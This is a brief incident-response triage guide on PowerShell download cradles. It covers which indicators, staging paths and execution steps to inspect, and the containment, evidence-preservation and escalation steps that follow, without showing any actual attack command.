PowerShell download cradle

A download cradle is a script pattern that retrieves remote content and prepares or executes it locally. In first-pass triage, the main job is understanding the chain before deciding whether to escalate.

What to inspect

• Remote indicatorsCapture URLs, domains, and any hard-coded tokens or campaign IDs.
• Local staging pathIdentify where the payload is written and whether it uses random file names in temp paths.
• Execution stepConfirm whether the script only downloads content or also launches it.

Next actions

• ContainmentBlock the domain or URL if policy allows and the activity is confirmed malicious.
• PreservationCollect script text, IOC list, and host telemetry before cleanup removes evidence.
• EscalationIf the script executes a dropped binary, escalate to sandboxing or malware analysis workflows.